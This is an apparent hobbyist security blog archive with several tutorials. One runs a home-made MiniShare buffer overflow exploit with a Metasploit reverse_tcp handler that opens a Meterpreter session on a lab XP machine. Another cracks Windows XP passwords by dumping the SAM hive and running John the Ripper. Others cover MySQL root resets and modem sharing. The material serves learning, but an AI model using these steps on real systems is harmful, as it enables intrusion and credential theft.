Archive for the ‘ hack_docs ’ Category

Lesson 0ne: Stack Based Buffer Overflow [minisploit.py]

#=========================================================#
I thought it was a good idea to start learning about exploit development and my first stop was on this wonderful blog by lupin (Thanks a LOT lupin).
to all the beginners like myself I would advice you to look at the tutorials they are exallent.
So after after going throgh the basics tutorial then I thought why not write the exploit from scratch again,make it take options from the command line and use meterpreter as a payload as well as host it some where for feature REFERENCE?
what is it:
++++++++
This is a simple stack based buffer over flow exploit. I wrote this one using the
guides from lupin’s blog as said earlier
It exploits a vulnerability in a Windows application MiniShare 1.4.1.
which is an older version of the MiniShare application
Requirements:

+++++++++++++
1.To test this script you will need a windows xp sp2 machine(can be a virtual machine)
2.The xp machine should be running minishare 1.4.1 available   here
3.An attack machine (should have python and metersploit  installed) bt should do
how to:
++++++
[1]First get the script from here
[2]The payload I used here is meterpreter/reverse_tcp so we need to start a listener on our
attacking machine to take care of this
how:
+++++
[a] run msfconsole from your terminal or from the msf installation directory

root@chim3ra:~# cd /pentest/exploits/framework3
root@chim3ra:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 696 exploits - 358 auxiliary - 52 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r12936 updated 11 days ago (2011.06.13)


Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >

[b]Then we use multi handler to listen on our attacking machine,set payload to meterpreter and lhost to our attacking ip.


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) >

[c]And finally we exploit


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...

[2]now make sure that minshare is running on your xp box if not just double click on the short cut in your desk top and drag a folder or file inside.
Ruunning the script:

++++++++++++++
[2]You may run the script with no options or with the -h (help) option to get the usage


root@chim3ra:~/exploit_home# ./minisploit.py
you need at least one arguments

###################################################################
#============+++++++++ minisploit.py ver0.1++++++++==============#
#----------------by ch!m3ra: http://www.chimera40.wordpress.com------------------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

Usage:./minisploit.py <options>
./minisploit.py -t <host> -p <port>
-t          The remote host to exploit
-p          The remote port (Default is 80)
-h          Simply print this help menu and exit for
Example:./minisploit.py -h 192.168.56.101 -p 80
(this will exploit minishare server at 192.168.56.101 )
or ./minisploit.py -h for help
please make sure you start multi handler(meterpreter)

[3]The run giving -t <host> (target option) where <host> is your xp machine ip
[4]NB:You may give the -p <port> (port option)  or leave it to default 80 where minishare runs on
by default.
[d]Everything set lets launch our exploit

root@chim3ra:~/exploit_home# ./minisploit.py -t 192.168.56.101 -p 80

###################################################################
#============++++++ minisploit.py ver 0.1 ++++++++++==============#
#--------by ch!m3ra: http://www.chimera40.wordpress.com-----------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

[+]Trying your payload on 192.168.56.101  Port 80 Please Wait......
[+]Connecting to  192.168.56.101 ........
[+]Connection successful!
[+]Delivering your payload be patient......
[+]Done!
[+]Your exploit data has been send to 192.168.56.101 Check you handler happy? :)
root@chim3ra:~/exploit_home#

[e]Done and when we check our handler
boooom!

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at Fri Jun 24 11:57:11 +0300 2011

meterpreter >

Thats all there is to the post I know its a long post for no good reason but its a post anyway 😉
If you have you have read all through then here are some goodies and some fun here.

This links collection I stubled over it on the net you must like it
Thanks to Myne-us for the links and lupin for teaching me you guys rock 🙂

[how to set up your phone as a modem in Linux]

################################################################  ######==================———————=====================#######

Howdy all!

In this blog post I will summarise what I presented at our JLUG meeting(how to get a reliable internet connection in your room using a mobile phone as a modem in Backtrack Linux).

Requirements:

~~~~~~~~~~~

[1]A YU line(you may use other but be ready to pay)

[2]A mobile phone(with cable) or any 3G modem e.g Hauwei or any other

[3]A linux machine(either installed or a live CD)

Steps:

   

~~~~~~~

[1]Setup:
To set up your modem(phone) plug it in and open a linux terminal,From the Linux terminal type:

code:

root@bt:~# wvdialconf

why? wvdialconf is part of the wvdial scripts that will help you setup your modem it will
(a)Detect your modem(first it will search the serial ports for available modems)

(b)After detection it will create a configuration file for you at /etc/wvdial.conf NB:after the command has terminated you should see a message at the end that the configuration file has been created.

[2]Edit conf file:
To edit the configuration file fire up your favorate text editor (mine is nano) and load the configuration file(/etc/wvdial.conf)

code:

root@bt:~#nano /etc/wvdial.conf

you should see some of these details(your modem type,port,baund rate etc) Uncomment the commented entries in this case Password,Username and Phone and make sure they have these values

Phone=*99#

Password=yu

Username=yu

When you are done just ctrl x (Control x ) why? this will save your changes and exit from the nano text editor.

[3]Connecting:
Now to the juicy part to connect just type:

code:

root@bt:~#wvdial

why? wvdial is simply the dialer script that will dial your Carrier(ISP) in this case YU so that you can be assigned an IP after this command you should get an IP,(your IP,gateway,a DNS server or two should be displayed) and a new interface will be created (usually ppp0) for you.

NB: don’t close this terminal untill you are done with the connection!!!

[4]Test the connection:
To test the connection simply ping whatever you want to:

code:

root@chimera:~# ping google.com
PING google.com (72.14.234.104) 56(84) bytes of data.
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=1 ttl=52 time=496 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=2 ttl=52 time=1016 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=3 ttl=52 time=416 ms
^C
--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2716ms
rtt min/avg/max/mdev = 416.679/643.066/1016.346/265.937 ms, pipe 2
root@chimera:~#

Success!!!

If you are alone thats all And for our Ubuntu brothers? no need to do all this !just plug and play stuff next, next, ok .

Sharing the connection

~~~~~~~~~~~~~~~~~~~~~~~

A times you may want to share this connection with your room mate or any body in the LAN but how?

Concept:

~~~~~~~~

The trick here is to simply tell your friend to use your IP as his/her gateway then you set up your linux machine as a gateway then you forward all the traffic.

NB:your friend’s OS does not matter and the connection speed will not be affected much. [Step I] First lets clear the iptables rules(not a must)

code:

root@chimera:~# iptables --flush
root@chimera:~# iptables --table nat --flush
root@chimera:~# iptables --delete-chain
root@chimera:~# iptables --table nat --delete-chain
root@chimera:~#

[Step II]

Set iptables to forward traffic through our new interface(ppp0)

code:

root@chimera:~# iptables --table nat --append POSTROUTING --out-interface ppp0 
-j MASQUERADE
root@chimera:~# iptables --append FORWARD --in-interface eth0 -j ACCEPT
root@chimera:~#

(where eth0 is our ethernet interface which should be in the LAN)

NB:where –table option is not specified we refer to the default table (filter) check the man pages (man iptables) for more info So far our machine is connected to the internet a fully configured as a gateway to the Internet for other machines in the LAN but we have not enabled IP forwarding in the kernel.

[Step III]

Enabling IP forwarding in our machine .So we need to edit the file /proc/sys/net/ipv4/ip_forward and change the value from 0 to 1 one can choose to use an editor or simply redirect 1 to that file . how?

code:

root@chimera:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@chimera:~#

this will change the value from 0 to 1

[step IV]

All done we tell our friend to set his/her gateway to our IP address

NB:to get our IP address simply type ifconfig the IP set for our eth0 should be our friends gateway IP. NOTE:We can make sure we are on the same network with our friend by typing:

code:
root@bt:~# ifconfig eth0 <our_IP> netmask<netmask> broadcast<broadcast> e.g

root@bt:~# ifconfig eth0 192.168.20.20 netmask 255.255.255.0 broadcast 192.168.20.255

And our freind has Internet connection as well!!!!!!

IMPORTANT

===========

This is not entirely free as you may think but its “free” in that the cost is fair for such connection speeds. To pick a tarrif dial *154# from your YU line and choose a package that fits your pocket or needs(option number 4 for individuals and number 3 for two or more people should be ok).

An automation shell script(to automaticaly do every thing for you) will be available for download soon keep watch:)

#######################################END######################################### ================Brought to you courtesy of ch!m3ra and JLUG======================== ###################################################################################

 
 
 
 
 
 

 

Recover mySQL root password

#########———————————————————-#############
———————+++++++++++++++++++++++++————————-
=================================================

[1] A times we may not be having the MySQL default root password especialy when
we are running a live system(Linux live CD ) and in some “other” situations.
This should not stop us on our tracks.
So get around this I came up with small tut on how reset the root user password
in under well few steps.
NB:tested on MySQL ver.5.0.67
[2] To start with check wether the Mysql service is running.

code:

#service mysql status <ENTER>

if mysql is running then do this to stop it

code:

#service mysql stop <ENTER>

you should get a message that the mysql service has been stopped

[3] Now that we have stoped the service will start it once more but this time in safe
mode and skip the grant tables which are used by mysql to the passwords(google this).

code:

 # mysqld_safe --skip-grant-tables <ENTER>


NB: This service is started but does not immediately go to the background so leave it
running and open a different terminal in another tab or window.
[4] In the new terminal login to the mysql database with a password (usually) by typing mysql.
code:

# mysql <ENTER>

This should log you in automaticaly i.e you should see this kind of prompt mysql>,some
instruction and probably the MySQL version in my case (5.0.67)

[5] Now we are logged in our database to change the root pasword we have use one of the
default databases to list them,

code:

# show databases ; <ENTER>

You should see a database named mysql to use it

code:

# use mysql ; <ENTER>

See every thing is ok or so it seems

[6] Finaly its time to change the password simply do this

code:

 # update user set Password=PASSWORD('your_new_password_here') WHERE user='root';

to flush the privileges

code:

 # flush privileges ;

finaly exit

code:

 # exit ;

[7] Now kill whatever is related to what we have been talking about i.e( ps -e | grep mysql)
eg mysqld-safe and or mysql if not already dead i.e (kill -9 <PID>)

YOU ARE NOW FREE TO LOGGIN INTO YOU DATABASE AS root# THE ORDINARY WAY

code:

 # mysql -u root -p <ENTER>

password: ************* <ENTER>

and you are done

NB:I have not Tried this a Windows installation of mySQL try it I think it should     work just make sure that mysqld.exe and mysql.exe are in your path! Well you     can also start mysql with a txt file having the following code.

code:

update user set Password=PASSWORD('your_new_password_here') WHERE user='root';
flush privileges;

(these two should be in separate lines)
you are done and don’t “forget” your password again!?

brought to you  courtesy of ch1m3ra & JLUG
+++++++++++++++++++++++++++=====END====+++++++++++++++++++++++++++++++++
========================================================================

“Recover win XP password”

Imagine you forgot your Win XP admin password and you have been completely locked out of your own machine.
More worse your friend lost(forgot) his you get into his room when  he is just a few seconds into reinstalling the system a fresh how would you help him?
Well there are so many way to recover the password but in this post I will share What I demonstrated at our JLUG meeting.

It’s an old trick but it worked fine.[click on the images for a better view]

step[1]
——-
boot the system with a Linux live CD or flush drive(USB)in my case I used BT3 Final,login and open a terminal and you are ready to go.

logged_in screen shot
step[2]
——-
Locate the partion where win XP has been installed most probably /mnt/hda1 for IDE hdd and /mnt/sda1 for SCSI hdd they will have been automatically mounted if not don’t worry do this:
check what you have in /dev,locate hdaX where X is 1,2,3…n.Then find whichever host the windows installation i.e you can mount each of them and find out what it has(the correct one should have windows system folders like %SYSTEMROOT% usually c:\Windows\system32):
>ls /dev/ | grep hda  #this command looks for hda partitions available
>mkdir /mnt/windows && mount /dev/hdaX /mnt/windows #this creates a dir “windows” in /mnt and mount your partition on it replace X accordingly from now hence4th our partition is mounted in /mnt/windows/


step[3]
——-
>cd /mnt/windows #move to our directory (not necessary)
>ls #this displays what is there
Win XP stores password information in the two files ‘sam’ and ‘system’ you will find them in /WINDOWS/system32/config
so we create our temp directory at home and a copy of the two files
>mkdir ~/tmp  #create a tmp dir at home
>cp /mnt/windows/WINDOWS/system32/config/sam  ~/tmp/ #copy sam to ~/tmp
>cp /mnt/windows/WINDOWS/system32/config/system ~/tmp/ #copy system to ~/tmp
>cd ~/tmp ; pwd ; ls #go to our new dir confirm that we are really there n display what we have there(sam & system)


step[4]
——-
now we use a tool called <bkhive2> on the hives (system) into a file we lets call it key ,another one called <samdump> to dump the hashes or something(SAM)  from the key put them into a single file let us call it pass and finaly use <john the ripper> to crack the password and we are done![thats how I understood it]
now from /mnt/tmp:
>bkhive system > key #you might not not see confirmation info
>samdump2 sam key > pass


step[5]
Now lets launch jtr or john if you like and direct and pass to him our password file and see him in action he can detect many algorithms NTLM,MD5 name them (google):
>john –incremental ~/tmp/pass #most likely you will have to launch john from were it is but type john and you get some info on what to do as for me I had to use:
>./john –incremental ~/tmp/pass #I was in john’s installation Directory
If you are lucky enough you should have you cracked passwords in seconds depending on how powerful is this machine,how strong is the password etc etc.

My machine is dearly slow by the twenty third second it had not cracked the simple password look into john for more faster means there lot of stuff use word list,cracking mode,loading only important passwords etc hope you mind is open dig more there is a lot .
IMPORTANT:there are better ways to get admin privileges in an XP machine than this using the same backtrack .This is only made to add on you knowledge.

for more on each of the above commands make good use of the man pages and Google bye bye

brought to you courtesy of ch!m3ra and JLUG

=====================http://www.chimera40.wordpress.com====================
enjoy responsibly
[snip]

mysql r00t password reset

==================================================================================================================

Here is a quick and a clean one on Debian installation mySQL version 5.0 sever I did this successfully without necessarily having to soil my hands

sorry no screen shots 😦

[step1]

from the prompt enter:

root@chimera:~# dpkg-reconfigure mysql-server-5.0

If all goes well you should be prompted to give the new root password

[step2]

re enter the root password and accept(usually by simply pressing <Enter> )

the mysqld demon will be stopped for and restarted once more and thats all there is 🙂

you should see something like this

root@chimera:~# dpkg-reconfigure mysql-server-5.0
Stopping MySQL database server: mysqld.
Stopping MySQL database server: mysqld.
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
root@chimera:~#

finally logging to the database and have nice time:

root@chimera:~# mysql -u root -p
Enter password:*******************

(your password will not be displayed as you type)

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
|                    |
+--------------------+
6 rows in set (0.00 sec)

mysql> \q

Bye

root@chimera:~#

NB:As you can see “your” tables will not changed at all

by the way if are bored of this local stuff  you may have a look at this

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

brought to you coutersy of ch!m3ra and JLUG

===================================================================================================================